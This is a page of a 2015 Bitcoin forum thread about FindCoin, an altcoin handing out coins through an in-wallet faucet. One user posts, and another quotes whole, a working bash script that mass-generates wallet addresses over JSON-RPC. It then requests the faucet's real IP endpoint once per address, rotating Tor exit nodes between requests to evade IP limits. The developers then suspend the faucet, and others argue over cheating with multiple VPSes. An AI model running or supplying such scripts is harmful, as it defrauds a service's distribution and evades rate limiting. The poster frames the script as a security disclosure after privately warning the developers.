Bitcoin Forum
May 02, 2024, 03:32:34 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 [40] 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ... 93 »
  Print  
Author Topic: [ANN][FIND] FindCoin | Update Wallet If You Haven't! | Community Anti-Scam Token  (Read 126316 times)
This is a self-moderated topic. If you do not want to be moderated by the person who started this topic, create a new topic.
redsn0w
Legendary

Activity: 1778
Merit: 1042

#Free market

View Profile
January 01, 2015, 11:17:03 AM

Come on guys , if you want your bounty make one of those things in the list (and ask your FIND):

2.26M of all coins are reserved for FindCoin bounties.

All these coins will be deposited to redsn0w escrow - https://bitcointalk.org/index.php?topic=768454.0
          Current official bounties are:
          500K for scam reports - we will pay 5k bounty for every well-investigated report on altcoins scam you know of. You can write about devs that ripped you off,
                  or services that ran away with clients' money, blaming hackers and hardware malfunction - we'll accept all kind of altcoins scam reports as long as they
                  are compliant with our FindCoin Scam Report Guide (we'll provide it on 29/12/14).
          1000K - reserved for backing up community bounties. If any member of FindCoin community decides to put up FindCoin bounty, we will use this reserve to double up his or her bounty.
          100K - for first FindCoin multipool.
          50K - for first block explorer with richlist.
          8K - for translation to 8 languages, 1k per language: Chinese, German, French, Italian, Spanish, Russian; another 2 languages - doesn't matter
                        what particularly - will be rewarded until all 8k is spent.
          2K - for FindCoin logo (won by Sarahiko, https://bitcointalk.org/index.php?topic=865270.msg9825338#msg9825338)
          600K reserve for future bounties; we are developing community, we're sure we'll think something up.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
Bitcoin addresses contain a checksum, so it is very unlikely that mistyping an address will cause you to lose money.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
fenghush

Activity: 658
Merit: 250

View Profile
January 01, 2015, 11:22:26 AM

I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec

This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.

Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.

First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal

Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
Code:
 while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:p@127.0.0.1:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.

Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.

RJX
Legendary

Activity: 1078
Merit: 1003

umachit.fund

View Profile
January 01, 2015, 11:38:34 AM

Fenghush, I like your style.

.UmaChit.Fund.
‎ ★
..Revolutionized Rotating..
..Savings & Borrowings.....

‎ ★
█████
██
██
██
██
██
██
██
██
██
██
██
█████
█████
██
██
██
██
██
██
██
██
██
██
██
█████
████████████████████████████
█████████████████▀▀  ███████
█████████████▀▀      ███████
█████████▀▀   ▄▄     ███████
█████▀▀    ▄█▀▀     ████████
█████████ █▀        ████████
█████████ █ ▄███▄   ████████
██████████████████▄▄████████
████████████████▀▀▀█████████
██████ ▀██████▀      ▄██████
██████▄   ▀▀▀        ███████
██████▄             ▄███████
███████▄           ▄████████
██████▀▀▀        ▄██████████
███████▄▄     ▄▄████████████
█████████████▀    ██████████
████████████    ▄▄██████████
███████████▀    ▀▀██████████
██████████▌       ██████████
████████████    ████████████
████████████▄  ▄████████████
kelsey
Legendary

Activity: 1876
Merit: 1000

View Profile
January 01, 2015, 11:47:41 AM

Hello,

We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.

It is a great decision! Fair to us who do not cheat in this distribution, I just got 2k coins, but cheaters can get 100k or more, they have lots of VPS/VPN.

I have to disagree with the VPS thing.

If this were any other coin received through mining, VPS would obviously give more hashing power yielding more coins.

I have 3 VPS with wallets each and as you can see in my older btctalk posts; I usually provided tons of hashing power to newly created coins. Including helping Monero's first launch earlier this year.

I do have to agree however that this coin verifies nothing of the VPS specs meaning I could potentially just get free VPS to rape it but it isnt worth my time but is an obvious issue to all of us as it defeats the purpose of a fair launch (in comparison with those who have VPS mining rigs).

Totally agree. The idea of "faucet distribution" is fair. I have 5 VPSes and I have to pay for it. It's a kind of investment. If I have 5VPS and I receive the amount equal to someone who has only 1 PC, it will be unfair. This is "In-wallet-faucet-distribution", not "person-distribution". Moreover, I downloaded the wallet file only 1 time on the first VPS and transfer to the other 4 VPSes. I think if other people do the same thing as me, the downloaded wallet will be much less then the number of opening wallet. It's easy to understand.

Yeah right so if I bank robber pays for his gun and get away car, he deserves the cash  Roll Eyes 

Trying to justify cheating, its a giveaway coin, meant to be one wallet per person, anyone doing otherwise cheated end of story.

Activity: 49
Merit: 0

View Profile
January 01, 2015, 11:53:22 AM

hi
happy new year to all.
my wallet hasnt paid out again, totally synced, not received for 5 hours. has/will the coin now be abandoned?.
at the moment everything is up in the air , just need clarification either way.
fenghush

View Profile
January 01, 2015, 12:16:20 PM

Hello,

We have turned off the faucet for the moment, as it seems we are getting two thousand requests more than we should (we have ~1.3k wallets downloaded). A vote will be posted tomorrow to decide if we want to continue faucet-based distribution or switch to another system. Until then, no faucet payments will be sent out.

It is a great decision! Fair to us who do not cheat in this distribution, I just got 2k coins, but cheaters can get 100k or more, they have lots of VPS/VPN.

If this were any other coin received through mining, VPS would obviously give more hashing power yielding more coins.

I have 3 VPS with wallets each and as you can see in my older btctalk posts; I usually provided tons of hashing power to newly created coins. Including helping Monero's first launch earlier this year.

I do have to agree however that this coin verifies nothing of the VPS specs meaning I could potentially just get free VPS to rape it but it isnt worth my time but is an obvious issue to all of us as it defeats the purpose of a fair launch (in comparison with those who have VPS mining rigs).

Totally agree. The idea of "faucet distribution" is fair. I have 5 VPSes and I have to pay for it. It's a kind of investment. If I have 5VPS and I receive the amount equal to someone who has only 1 PC, it will be unfair. This is "In-wallet-faucet-distribution", not "person-distribution". Moreover, I downloaded the wallet file only 1 time on the first VPS and transfer to the other 4 VPSes. I think if other people do the same thing as me, the downloaded wallet will be much less then the number of opening wallet. It's easy to understand.

Yeah right so if I bank robber pays for his gun and get away car, he deserves the cash  Roll Eyes  

Trying to justify cheating, its a giveaway coin, meant to be one wallet per person, anyone doing otherwise cheated end of story.

People will cheat if cheating is possible. Designs work not because people are honest, but because they're secure and even then it doesn't stop people from trying to attack it. Like the bitcoin network for example, it is trustless, no single entity is trusted and that's the reason it is secure. If a bank robber enters the bank unarmed, loots the vault and walks away free without anyone stopping him, the bank dropped the ball. Crying about cheating because your system is broken is childish to say the least and it doesn't fix anything.

HarryPotHead

Activity: 192
Merit: 100

You are what you eat. PIZZA!

View Profile
January 01, 2015, 12:29:38 PM

I vote fenghush gets a bounty for his effort, it's more than people are getting for sloppy translations,  5-10k minimum

HarryPotHead

View Profile
January 01, 2015, 12:35:54 PM

Hello,

Yeah right so if I bank robber pays for his gun and get away car, he deserves the cash  Roll Eyes 

+1

You could not be more right, all these guys please don’t change it, we deserve more coins because we brought vps/payed for our guns etc lol 

The same people who keep asking for exchanges so they can dump and destroy the coin

Brah

Activity: 42

View Profile
January 01, 2015, 12:57:43 PM

Hello,

Hello,

+1

You could not be more right, all these guys please don’t change it, we deserve more coins because we brought vps/payed for our guns etc lol 

The same people who keep asking for exchanges so they can dump and destroy the coin

You guys do realize how asinine you look?

So when a user has more resources to mine, its cheating? Okay now  Roll Eyes

Anyways, apparently this coin has too many exploits through weak security (coding). The VPS getting users more cash isn't cheating. That's just complete childish jealousy.

If you have more resources, you will gain more. Its not robbing. LOL. I can't believe you guys compared this to robbing people at gun point. LMFAO
HarryPotHead

View Profile
January 01, 2015, 01:19:47 PM

@ Brah

Asinine, big word for a brah.

You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol

Use your equipment for well, MINING!!

Using exploits threw any method is actually cheating brah  Roll Eyes atleast make sense.

Jealousy because you spend 30 dollars a month on vps are you for real?

MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN! 

Brah

Activity: 42

View Profile
January 01, 2015, 01:27:13 PM

@ Brah

You are talking about a hole different kettle of fish dude, mining is/ well it's mining lol

Using exploits threw any method is actually cheating brah  Roll Eyes atleast make sense.

MY POINT STILL STANDS ALL YOU GENIUS'S WHO RUN YOUR VPS to accumulate more than joe, WILL DUMP THE MINUTE IT HITS AN EXCHANGE AND KILL THE COIN! 

More resources for anything = higher yield.

Having VPS to get faucet isn't an exploit.

The coding using the URL to get the faucet with 100s of wallets on one PC/VPS = exploiting.

I suggest you refrain from flaming when your username is "HarryPotHead" and can barely manage making a single valid point.

Really, yet you don't see how my comparison to mining is more accurate  (more mining rigs = more than "joe") vs your asinine comparison to robbing people at gunpoint? Anyways I won't waste any more time on you.

As for the coin, the lack of coding sunk the ship not the VPS resources.
fenghush

View Profile
January 01, 2015, 01:35:51 PM

If the devs are still up for it, I can help out to make the faucet distribution a bit more secure and fair for everyone, advanced attacks will still be possible but they will probably cost more than the reward received.

HarryPotHead

View Profile
January 01, 2015, 01:44:27 PM

@ Brah

More resources for anything = higher yield.

Having VPS to get faucet isn't an exploit.

The coding using the URL to get the faucet with 100s of wallets on one PC/VPS = exploiting.

I suggest you refrain from flaming when your username is "HarryPotHead" and can barely manage making a single valid point.

Really, yet you don't see how my comparison to mining is more accurate  (more mining rigs = more than "joe") vs your asinine comparison to robbing people at gunpoint? Anyways I won't waste any more time on you.

As for the coin, the lack of coding sunk the ship not the VPS resources.

I am sure you are unable to read brah, here let me help you out read carefully you may miss it,

You could not be more right, all these guys please don’t change it, (we deserve more coins because we brought vps/payed for our guns etc lol)

If you look payed for our guns etc LOL, now we know you have no sense of humour that is clear you also cannot read, you cheat and do not like being told you do, MINING IS PROOF OF WORK and has nothing in common with PROOF OF FAUCET which was designed for fair distribution,

As for flame war with a name LMAO again that is for someone who is stuck up their own ass.

I am so jealous you have vps not slightly annoyed that people make something fair unfair! When i opened the wallet i was getting 75Find an hour then you plonkers turn up and ruin it, so i closed wallet and not opened since, until i exchange FindYouCoins.

I spend less money to get more coins anyway i am so jealous haha  Lips sealed    

El Emperador

Merit: 500

View Profile
January 01, 2015, 01:55:38 PM

I can translate into Italian language.  Wink

.7 BTC  WELCOME BONUS!..
███████████████████████████
██████████▀▀▄▄▄▄▄ ▄▀▀██████
█████████▄██████ ████ ▀████
██████▀▀ ▄▄▄▄ ▀▀███▀▄██ ███
████▀   ██████   ▀██████ ██
███ ▄▄▄████████▄▄▄ ██▄▄▄ ██
██ █████▀    ▀█████ ████ ██
██  ▀██        ███▀ ███ ███
██   ▄██▄    ▄██▄   █▀▄████
███ ▄████████████▄ ████████
████▄▀███▀▀▀▀███▀▄█████████
██████▄▄      ▄▄███████████
█████████████████████████████████████████████████████████████████████████████████████████████
█████████████████████████████████████████████████████████████████████████████████████████████
██████████████████████████████▄▄▄█████▄▄▄████████████████████████████████████████████████████
██████████▄█████▄█▄███▄█▄██████████▄██▀▀▀████████████████████████████████████████████████████
██████████████▀████▄████▀██████████████████████████▄█████▄██▄█████▄████▄████▄████▄████████
█████████████████▐█████▌███████████▄█████▀███▀▀████████▀▀▀▀█████▀▀▀██████▀▀███▀▀███████████
██████████████▄████▀████▄██████████████████▄▄▄▄▄███▄▄▄▄█████▄▄▄████████████████████████
████████████████▀█▀███▀█▀██████████▀███████▀█████████▀█████▀██▀█████▀███████████████████████
██████████████████████████████▀▀▀████████████████████████████████████████████████████████████
████████▀▀  ▐█▌  ▀▀████████
██████▄     ▐█▌     ▄██████
████ ▀██▄▄███████▄▄██▀ ████
███    ██▀▀  ▄  ▀▀██    ███
██    ██   ▄███▄   ██    ██
████████  ███████  ████████
██    ██  ▀▀ █ ▀▀  ██    ██
███    ██▄▄ ▀▀▀ ▄▄██    ███
████ ▄██▀▀██████▀▀▀██▄ ████
██████▀     ▐█▌     ▀██████
████████▄▄  ▐█▌  ▄▄████████
.30+  ALTCOINS AVAILABLE..
johnbrainless

Activity: 280

View Profile
January 01, 2015, 02:01:58 PM

I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec

This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.

Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.

First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal

Code:
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
Code:
 while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:p@127.0.0.1:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.

Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.

we now can rename this coin to failcoin. byebye people

♝ Pandacoin   ♝ Buy With Paypal Or Credit Card ♝ FaceBook tipping ♝ Irc channel #DigitalPandacoin with tipbot
✬ Earn 2.5% Annual Interest ✬ Active Dev Team ✬ Blazing Fast Multi Mode Wallet ✬ Paper Wallet ✬ No premine or IPO ✬
☠☠☠☠☠☠☠ PANDACOINPND (´(ェ)`) Digital Pandacoin (´(ェ)`) PANDACOINPND ☠☠☠☠☠☠☠
Hollowman338
Legendary

Activity: 1246
Merit: 1000

View Profile
January 01, 2015, 02:29:41 PM

Code:
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Code:

Code:

we now can rename this coin to failcoin. byebye people

They gave it the old college try.  I'll give them that.
johnbrainless

Activity: 280

View Profile
January 01, 2015, 02:45:34 PM

whats going on with the distro?

♝ Pandacoin   ♝ Buy With Paypal Or Credit Card ♝ FaceBook tipping ♝ Irc channel #DigitalPandacoin with tipbot
✬ Earn 2.5% Annual Interest ✬ Active Dev Team ✬ Blazing Fast Multi Mode Wallet ✬ Paper Wallet ✬ No premine or IPO ✬
☠☠☠☠☠☠☠ PANDACOINPND (´(ェ)`) Digital Pandacoin (´(ェ)`) PANDACOINPND ☠☠☠☠☠☠☠

Activity: 49

View Profile
January 01, 2015, 02:55:18 PM

have payouts stopped?, no payouts today!
fudge

Activity: 666
Merit: 500

View Profile
January 01, 2015, 03:50:17 PM

Distribution is temporarily stopped due to cheaters

Haшa гpyшa нaйpoзкopчyмaкyвaтiшa!

Activity: 56

View Profile
January 01, 2015, 04:57:50 PM

Distribution is temporarily stopped due to cheaters

So I am guessing things got out of hand for the dev team (which was cheating as well in the first place) so now it is the fault of the cheaters?

You were warned long before this.

What made you change you mind?

Let me guess...
Not enough coins left for you to "collect"?

This was a scam coin to begin with.

I feel sorry for the FindYouCoin holders.  1000:1 towards a true scam coin?

tststststs

Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 [40] 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ... 93 »
  Print  

Jump to: